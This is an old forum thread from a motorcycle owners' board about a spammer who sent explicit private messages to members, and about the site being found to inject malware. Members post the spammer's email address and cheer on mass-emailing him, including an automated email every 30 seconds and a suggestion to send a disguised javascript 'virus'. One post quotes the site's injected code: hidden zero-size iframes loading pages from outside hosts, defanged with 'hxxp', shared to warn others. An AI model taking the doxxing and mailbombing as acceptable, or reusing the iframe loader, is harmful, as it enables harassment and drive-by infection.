while I wouldnt condone any sort of retaliation...here's RobertT's email:
donald92135@yahoo.com
He created an account here, and replied to my reply request for verification of email for the account...prior to spamming the board.
It would be a shame for his inbox to get slammed....
thanks for BANing him so quickly pantablo :thumb:
now im off to spread email joy.
Thanks for the info, time for payback. :2guns:
It seems that he's been quite the busy little porn spammer bee:
Pathetic Spammer Who Has No Life (http://www.google.com/search?q=donald92135%40yahoo.com&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official)
If he is as good as I suspect he is, this is a dummy box set up to take the heat. Regardless, he has been dealt with.
Many thanks.
Hey Pandy! ;)
may be a dummy but he uses it and checks it. otherwise he wouldnt have replied to me to activate his account.
btw-pandy was the first on the scene and did the dirty work.
Quote from: starwalt on December 03, 2006, 04:58:22 PM
Hey Pandy! ;)
Hey....this thread just got a lot brighter! Hiyaz, starwalt! ;)
Quote from: annguyen1981 on December 03, 2006, 07:52:24 PM
Don't talk to her... :laugh:
Be nice, or I'll unban RobertT, and he'll post s'more nice pics just for you! :flipoff: :laugh:
you mean that guy wan't for real?!!!!
darn... I was wondering if he had any suggestions on how to mod the GS to accommodate junk that size... now I guess I'll just have to keep swinging it over my shoulder like I have been for the last few years :cry:
I don't know if this is related, but when I go to:
hxxp://gstwins.com
I get this code below, before the real website is loaded. It looks suspicious to me. I don't know if gstwins.com has been hijacked, or it is something on my end.
--------------------
<meta HTTP-EQUIV="REFRESH" content="0; url=hxxp://www.gstwin.com"><!--iframe src=hxxp://81.29.241.195/part/index.php width=0 height=0></iframe-->
<!--iframe src=hxxp://81.29.241.195/part/index.php width=0 height=0></iframe-->
<iframe src=hxxp://81.29.241.195/part/index.php width=0 height=0></iframe>
<iframe src='hxxp://wsfgfdgrtyhgfd.net/strong/022/' width=1 height=1></iframe>
<iframe src='hxxp://wsfgfdgrtyhgfd.net/adv/new.php?adv=22' width=1 height=1></iframe>
EDIT: CHANGED HTTP TO HXXP SO PEOPLE DON'T GO THERE AUTOMATICALLY BY CLICKING THE LINKS!!!
Well something is going down because my Symantec Anti-Virus told me this.....
Threat: Downloader has attempted to infect your computer!
Action taken: Clean failed : Delete failed : Access denied
If the above Action taken contains:
'Clean succeeded', 'Quarantine succeeded', 'Delete succeeded', 'File deleted' or 'Access denied',
your computer was NOT infected. It is OK.
No further action by you is necessary.
Otherwise, contact your local Helpdesk, immediately !!!
well did you click on any of his links? that may be where the virus was coming from.
wait :laugh:
+1.
I'm not having ANY trouble.
Wannabe - sounds like a virus of trojan or something
xtalman - sounds like some settings in ur browser aren't right?!?!? :dunno_white:
Nah I didnt click on any of the links. All I did was type www.gstwins.com in the address bar.
annguyen: I noticed three little squares in my browser and a delay, before I was redirected to the board. Then my Symantec AV popped up and told me there was the possibility of a trojan or virus. So I reloaded, and did a "View Source Code" and that is the code that I saw.
Note: I went to gstwins(dot)com not gstwin(dot)com
I got the same thing as xtalman. Porbably something the mods should take a look at.
Yeah, I sent a msg earlier to Srinath, but I don't think he's read it yet. I'm going to "Report myself to the moderator" :laugh: and hopefully get their attention.
EDIT: Dammit, I can't do that! Somebody report my post, #10 in this thread.
Done. xtalman
I've sent well over 20 emails. I'm sure he'll delete them in about .2 seconds, but meh...makes me laugh. :laugh:
-T.
I just checked out gstwinS.com and gstwin.com
both get directed to the same site. :dunno_white:
So my wife the programming genius that she is has set up a automatic e-mail to this idiot every 30 seconds it's classic....
Quote from: annguyen1981 on December 03, 2006, 10:02:32 PM
I just checked out gstwinS.com and gstwin.com
both get directed to the same site. :dunno_white:
Yes they do. But it appears to me that gstwin
S dot com is trying to install a trojan/virus or something before sending you to the real board.
that was one giant schong.
1/2 man 1/2 horse if that thing was real
-ash
we're working on it right now. thanks for letting us know...yes, there is a trojan on the server side of things. server may be down for a bit as we update the forum
for now, try housecall at trendmicro.com. free software works great to remove trojans...and if you arent already you should be on firefox...
to bypass it either type http://gstwins.com/gsboard/ or http://gstwin.com/ . if you have the forums bookmarked you are probably fine though.
f%$k
I just realized that my Norton Internet Security was disabled. For how long in a mystery.
Damn it!
Quote from: shmdalum on December 03, 2006, 10:26:08 PM
So my wife the programming genius that she is has set up a automatic e-mail to this idiot every 30 seconds it's classic....
Thats awesome!!!
I sent him a few pics of my dog taking a dump!
Quote from: shmdalum on December 03, 2006, 10:26:08 PM
So my wife the programming genius that she is has set up a automatic e-mail to this idiot every 30 seconds it's classic....
:laugh: :cheers:
Best believe I'm sending a whole pile of shaZam!. :icon_mrgreen:
That idiot hit the SVriders board too. I was like. . . WFT? A personal message on SVriders? I haven't looked at that site since. . . July!
Quote from: Jake D on December 04, 2006, 08:33:52 AM
That idiot hit the SVriders board too. I was like. . . WFT? A personal message on SVriders? I haven't looked at that site since. . . July!
Same here. He must be one busy dude....Maybe he pissed off some biker and got his ass kicked royally; and this is his way of getting back :dunno_white:
Someone needs to imbed one of those annoying javascript "viruses" (the ones that make you click the ok button for like 3 hours) into an image or something; then send it in a noticeable email. Something like "Registration Confirmation" or something like that.
- i wrote one. They are extremely easy to stop and were only ever designed to fool the stupid people. CTRL-ALT-DELETE then select the browser running it and and just end task. :)
yeah i got the pm too, just noticed it. the annoying viruses are just that annoying but judging from the way this guy spams he probably isn't the smartest person alive lol.
1st time I checked the site since thursday. Got the PM, felt bad he was so small. :laugh:
BUT, I am at work and am admittedly not the most PC friendly person. I ran a symantec virus scan (basic and complete) and found 0 viruses. My link is setup as a favorite to take me directly to the Forum homepage. I haven't noticed any issues but being at work, I don't want to go to more non-work sites than I need to. Do any of you know if the problem was taken care of before 2:15 eastern time today?
I really don't want to have to bother the IT guys so can someone better at this crap than me help? I think I'm ok but not sure. Thanks.
Out of curiosity, what was his reply to the verification email, Pablo?
No, the problem is still there.
If you go directly to gstwins.com/gsboard, you avoid it.
hxxp://gstwins dot com still has the hijacking index.html page.
Quote from: xtalman on December 04, 2006, 12:38:10 PM
No, the problem is still there.
If you go directly to gstwins.com/gsboard, you avoid it.
Thanks for the quick reply.
I also clicked on the PM and brought up the NSFW message/image....that's ok too as far as the actual PM link?
Quote from: Egaeus on December 04, 2006, 12:37:37 PM
Out of curiosity, what was his reply to the verification email, Pablo?
QuotePlease activate my account. Thank you.
pablo maida <pantablo@yahoo.com> wrote: gstwin verification
Please reply to this email to activate your new gstwin account.
kind regards,
Hmm....could have been automated.
yeah it probably was.
aye mines doin it as well, cept thru avg
Quote
- i wrote one. They are extremely easy to stop and were only ever designed to fool the stupid people. CTRL-ALT-DELETE then select the browser running it and and just end task. Smiley
Even better - WIN + U x2 and select ubuntu when boot loader comes up or just slide to the other end of the desk and use the mac - no more worries.
Quote from: mjn12 on December 05, 2006, 08:32:42 AM
Even better - WIN + U x2 and select ubuntu when boot loader comes up
You mean you have an option?
Well school requires some xp only software so its either install the free windows os they provide me or trek to the computer lab whenever theres an assignment due. I've messed with wine (or whatever the new version of its called) and for what its worth I'll sacrifice a few gigs for xp and some time saved. I don't go for the *nix only mentality - if you really want to be valuable in the whole tech industry you can't lock yourself down to one OS. Gotta be solid on any platform.
Exciting stuff right :icon_rolleyes:
I'm bumping this thread, because folks who haven't checked their PMs for a while are finding RobertT's lovely treat still.... and I show that over 1300 members STILL have this in their PM boxes (probably members who haven't been around since before the SPAM was sent).
Since we implemented the new membership controls, we haven't had a repeat incident of this nature, but continue to be careful about what you open from those you don't know (and I'm talking beyond GSTwin!). :thumb:
Also, please note that I turned on a function that allows users to report PMs that are offensive or abusive, such as this one.
Quote from: ****** on April 22, 2007, 05:18:54 AM
********* has reported the below personal message, sent by RobertT, for the following reason:
well, it should be obvious.
Below are the original contents of the personal message which was reported:
Quote from: RobertT on December 03, 2006, 01:40:11 AM
If you have some time check out this COOL pic:
:kiss3:
Bump again
Bump.....members are still discovering this little gem in their PM boxes..... :cry:
roflmao super schlong is still on the prowl? :laugh: